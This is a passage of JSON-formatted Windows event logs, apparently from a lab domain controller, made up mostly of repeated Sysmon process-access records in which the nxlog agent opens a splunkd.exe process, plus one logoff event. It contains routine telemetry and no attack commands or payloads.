(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:12.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:12.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:13.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:13.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:14.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:14.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220664,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66804\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x66804","LogonType":"3","EventReceivedTime":"2020-08-01 06:56:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:15.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:15.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:16.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:16.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:17.536\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:17.536","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 